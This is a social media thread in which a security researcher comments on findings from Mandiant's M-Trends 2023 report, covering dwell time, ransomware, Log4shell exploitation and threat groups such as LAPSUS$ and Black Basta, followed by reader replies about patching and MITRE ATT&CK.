Kevin BeaumontApr 18, 2023

Things I found interesting in Mandiant's M-Trends 2023 report, a thread. This is their yearly report on cybersecurity.

Direct link to PDF, to avoid the sales lead generator: https://mandiant.widen.net/s/dlzgn6w26n/m-trends-2023

For starters - dwell time - how long orgs take to detect incidents - is at its lowest ever, at 16 days (13 days for internal incidents).

"Improvements in global median dwell time in 2022, regardless of detection source, enabled organizations to respond to incidents faster than ever before."

Show threadKevin BeaumontApr 18, 2023
You can see a clear trend in dwell time over the past decade - some orgs are finally getting to the place where they can respond to incidents a few weeks after they begin.
Show threadKevin BeaumontApr 18, 2023

The report highlights the dwell time for ransomware in 2022 was 9 days.

I realise this conflicts with the press headlines that 'OMG org wide ransomware in 30 minutes!!1!', but those headlines are bullshit by vendors designed to scare you - both the data and first hand experience tells you ransomware groups almost always spend over a week with lateral movement and exfil before ransomware deployment. You can catch and evict them during that window.

Show threadKevin Beaumont

40% of intrusions Mandiant looked at involved data theft, up from 29% the year prior.

Anybody in the trenches knows this one - once those ransomware/not-ransomware boys show up, they steal stuff and sell it later or try to extort you. The cycle of monetisation, basically.

Apr 18, 2023 at 2:29pmWeb
Show threadKevin BeaumontApr 18, 2023
Log4shell was used in 16% of investigations, presenting nearly half of all exploits in real world security incidents. Yes, years later, orgs still haven't updated Log4j - I know the industry thinks I overhyped Log4shell, but... well... look at the data.
Show threadKevin BeaumontApr 18, 2023

"Of all threat groups observed in 2022, Mandiant assessed that 48% of these threat groups to have financially motivated operations, "

Follow the money.

Show threadKevin BeaumontApr 18, 2023

In terms of frequently seen malware in real world incidents, Qakbot and SystemBC still sit right up there unsurprisingly.

"This likely reflects the increased usage of malware
like SYSTEMBC which is used heavily by actors who deploy ransomware."

BEACON is Mandiant's polite way of saying CobaltStrike.

Show threadKevin BeaumontApr 18, 2023
There's very clear evidence that, if you have the money, mapping your defence to MITRE ATT&CK and going for high risk techniques pays off.
Show threadKevin BeaumontApr 18, 2023

Mandiant have a section of LAPSUS$

See how LAPSUS$ walked in through the front door by MFA bombing to bypass zero trust (something which Mandiant leave out somehow, hire me pls), then go absolutely crazy when internal by living off the land.

Show threadKevin BeaumontApr 18, 2023
On Black Basta, Mandiant link it to Conti - which would be right. They're even reusing Conti infrastructure (not mentioned).
Show threadKevin BeaumontApr 19, 2023
I completely skipped the nation state APT stuff in the Mandiant M-Trends report as nobody got time for that in 2023.
Show threadKevin BeaumontApr 19, 2023

Btw, one big positive is if the dwell time reduction trend continues, in about 5-10 years it might catch up with ransomware dwell time for many incidents.

My big take away for the year is.. cyber defence works, you just have to get on with it.

Show threadoci3oApr 26, 2023

@GossiTheDog Cyber defence works yes, but the issue is the higher ups a lot of times, dont want to spend the time / money to do it because its "not important"

A company I recently worked for got hit with ransomware last year, took our 90% of their infra in a weekend, but before then most of the IT team simply didn't give two about say patching, they actively turned off update services, ran out of date software, because it was too much work and could cost downtime.

It wasn't until they got hit, and realised the shit show they where in that cyber defence pays, so after paying contracting companies untold amounts of money to get them sorted.

A lot of orgs don't care until it hits them where it hurts, aka the wallet.

Show threadMcKinleyMikeApr 18, 2023

@GossiTheDog

There is a slight problem with this when we are talking about "techniques". There are hundreds of ways to utilize certain techniques in ATT&CK, and without guidance, it is easy to miss a large number of them.

It is difficult to say we detect "Signed Binary Proxy Execution" in totality using purely ATT&CK.

To that end, ATT&CK feels like a starting point.

Show threadAccidental CISOApr 18, 2023
@GossiTheDog That sounds hard. Can't I just check some boxes or something?
Show threadDan TurnerApr 18, 2023
@GossiTheDog I wonder if using MITRE ATT&CK is a sign of a mature org, or if orgs use it to become more mature? I.e. which way round is the causality? Can execs mandate it an reasonably expect some measurable decrease in odds or impact of a security incident?
Show threadNicholas WeaverApr 18, 2023

@GossiTheDog
JUST 50%?

And people wonder why I want cryptocurrency to die in a fire...

Show threadbrian $Apr 18, 2023

@GossiTheDog People still download vulnerable versions

https://www.sonatype.com/resources/log4j-vulnerability-resource-center

Log4j Updates and Vulnerability Resources | Sonatype

The wave of security vulnerabilities and exploitation affecting Log4shell continues to be a serious concern. We developed a one stop shop of Log4j resources.

Show threadGabe SchuylerApr 18, 2023
@GossiTheDog A troubling trend I'm seeing is virtual appliances that have old log4j on them but people are afraid of updating. (Or even don't know it's there and the vendor isn't being proactive about notifying them.)